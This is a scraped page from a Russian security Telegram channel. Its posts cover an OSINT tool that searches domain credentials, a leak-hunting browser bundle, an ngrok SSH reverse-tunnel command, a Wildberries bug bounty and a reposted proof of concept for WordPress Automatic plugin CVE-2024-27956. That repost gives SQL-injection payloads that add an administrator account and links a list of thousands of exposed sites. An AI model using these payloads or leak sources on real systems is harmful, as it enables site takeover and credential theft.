ru
Feedback
Fsecurity | HH

Fsecurity | HH

Открыть в Telegram
2 008
Подписчики
-224 часа
Нет данных7 дней
-1230 день
Архив постов

Chiasmodon #OSINT Поиск данных, связанных с доменом, включая электронную почту домена, учетные данные домена (имена пользоват
Chiasmodon #OSINT Поиск данных, связанных с доменом, включая электронную почту домена, учетные данные домена (имена пользователей и пароли), CIDR (Classless Inter-Domain Routing), ASN (Autonomous System Numbers) и субдомены. Инструмент позволяет пользователям осуществлять поиск по домену, CIDR, ASN, электронной почте, имени пользователя, паролю или идентификатору приложения Google Play. Ссылка на инструмент. LH | Новости | Курсы | Мемы #рекомендация #рекомендации

Рады ? 🤔
Anonymous voting

РЕЛИЗ Venator Red 2.0 ❗️ ❗️ОБНОВЛЕНИЕ: • Добавлено огромное количество источников для работы с утечками баз данных. Форумы, в
РЕЛИЗ Venator Red 2.0 ❗️ ❗️ОБНОВЛЕНИЕ: • Добавлено огромное количество источников для работы с утечками баз данных. Форумы, ведущие Telegram-каналы с самыми свежими утечками 📕 • Обновлен список OSINT-инструментов для работы в DarknetПОЛНОСТЬЮ переработана сортировка источников в браузере 🔺 п.с. для большей безопасности мы поставили строгие параметры для подключения только к серверам определенных стран. Поэтому если у вас не идёт подключение, попробуйте или VPN поставить, или удалить файл torrc по адресу - Venator Red 2.0\Tor Browser\Venator\Browser\TorBrowser\Data\Tor п.с. 2 Огромное спасибо всем, кто оказывает поддержку на нашем Boosty. Благодаря вам проект всё активнее развивается и становится всё лучше и лучше Скачать: Yandex Disk Google Disk

sticker.webp0.20 KB

Repost from 1N73LL1G3NC3
👩‍💻 PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9) Since "q" is pas
+1
👩‍💻 PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9) Since "q" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. Adding a new WordPress user:
q=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28
Giving the user admin rights:
q=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c
PWNED! Note: Param "integ" is the md5sum of the query. 6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22 Tweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12

Ngrok: Агент обратного туннелирования SSH Знаете ли вы, что можно использовать ngrok, даже не устанавливая его? Вы можете зап
Ngrok: Агент обратного туннелирования SSH Знаете ли вы, что можно использовать ngrok, даже не устанавливая его? Вы можете запустить туннелирование через SSH, не загружая агент ngrok, с помощью команды:
ssh -i ~/.ssh/id_ed25519 -R 80:localhost:80 v2@tunnel.us.ngrok.com http
Читать подробнее: https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent/ LH | Новости | Курсы | Мемы #рекомендация #рекомендации

sticker.webp0.20 KB

Repost from WB на связи!
Bug bounty для бизнеса, или как взломать Wildberries Уже не первый год мы реализуем программу поиска уязвимостей в системах з
Bug bounty для бизнеса, или как взломать Wildberries Уже не первый год мы реализуем программу поиска уязвимостей в системах за вознаграждение. Сейчас в область исследования входят все ресурсы компании, включая сервисы для покупателей, продавцов, курьеров, исполнителей на складах и пунктах выдачи заказов.  В новом видео мы расскажем:  🔵как работает программа и каких результатов удалось достичь команде,  🔵что мотивирует этичных хакеров на участие и сколько можно заработать,  🔵какие дополнительные преимущества можно получить в комьюнити.  Разобраться в этом нам помогут:  ➡️Александр Хамитов, руководитель направления продуктовой безопасности Wildberries,  ➡️Рамазан Рамазанов, этичный хакер и активный участник программ Bug bounty.  💜 Смотрите на нашем YouTube-канале